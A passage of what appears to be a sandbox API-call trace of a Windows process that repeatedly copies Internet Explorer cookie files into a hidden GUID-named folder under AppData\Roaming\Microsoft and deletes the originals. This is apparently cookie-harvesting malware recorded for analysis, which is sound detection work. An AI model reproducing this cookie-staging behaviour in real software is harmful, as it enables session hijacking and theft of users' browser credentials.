lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.849] StrChrW (lpStart="RTEPN67M.txt", wMatch=0x74c005c) returned 0x0 [0252.849] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="RTEPN67M.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RTEPN67M.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RTEPN67M.txt" [0252.849] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RTEPN67M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rtepn67m.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RTEPN67M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\rtepn67m.txt"), bFailIfExists=0) returned 1 [0252.855] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RTEPN67M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rtepn67m.txt")) returned 1 [0252.856] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.856] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.856] StrChrW (lpStart="Low\\RYK7X1K4.txt", wMatch=0x74c005c) returned="\\RYK7X1K4.txt" [0252.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.857] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.857] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.857] StrChrW (lpStart="RYK7X1K4.txt", wMatch=0x74c005c) returned 0x0 [0252.857] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="RYK7X1K4.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RYK7X1K4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RYK7X1K4.txt" [0252.857] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RYK7X1K4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ryk7x1k4.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RYK7X1K4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ryk7x1k4.txt"), bFailIfExists=0) returned 1 [0252.879] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RYK7X1K4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ryk7x1k4.txt")) returned 1 [0252.880] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.880] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.880] StrChrW (lpStart="Low\\S0EK69P5.txt", wMatch=0x74c005c) returned="\\S0EK69P5.txt" [0252.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.880] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.880] StrChrW (lpStart="S0EK69P5.txt", wMatch=0x74c005c) returned 0x0 [0252.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="S0EK69P5.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\S0EK69P5.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\S0EK69P5.txt" [0252.880] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\S0EK69P5.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\s0ek69p5.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\S0EK69P5.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\s0ek69p5.txt"), bFailIfExists=0) returned 1 [0252.886] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\S0EK69P5.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\s0ek69p5.txt")) returned 1 [0252.887] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.887] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.887] StrChrW (lpStart="Low\\SEVCUJM3.txt", wMatch=0x74c005c) returned="\\SEVCUJM3.txt" [0252.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.887] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.887] StrChrW (lpStart="SEVCUJM3.txt", wMatch=0x74c005c) returned 0x0 [0252.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="SEVCUJM3.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\SEVCUJM3.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\SEVCUJM3.txt" [0252.887] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\SEVCUJM3.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\sevcujm3.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\SEVCUJM3.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\sevcujm3.txt"), bFailIfExists=0) returned 1 [0252.894] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\SEVCUJM3.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\sevcujm3.txt")) returned 1 [0252.895] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.895] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.895] StrChrW (lpStart="Low\\STGOZ493.txt", wMatch=0x74c005c) returned="\\STGOZ493.txt" [0252.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.895] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.895] StrChrW (lpStart="STGOZ493.txt", wMatch=0x74c005c) returned 0x0 [0252.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="STGOZ493.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\STGOZ493.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\STGOZ493.txt" [0252.895] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\STGOZ493.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\stgoz493.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\STGOZ493.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\stgoz493.txt"), bFailIfExists=0) returned 1 [0252.902] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\STGOZ493.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\stgoz493.txt")) returned 1 [0252.903] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.903] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.904] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.904] StrChrW (lpStart="Low\\T1LCPPSA.txt", wMatch=0x74c005c) returned="\\T1LCPPSA.txt" [0252.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.904] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.904] StrChrW (lpStart="T1LCPPSA.txt", wMatch=0x74c005c) returned 0x0 [0252.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="T1LCPPSA.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\T1LCPPSA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\T1LCPPSA.txt" [0252.904] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\T1LCPPSA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\t1lcppsa.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\T1LCPPSA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\t1lcppsa.txt"), bFailIfExists=0) returned 1 [0253.020] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\T1LCPPSA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\t1lcppsa.txt")) returned 1 [0253.021] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.021] lstrcatW (in: 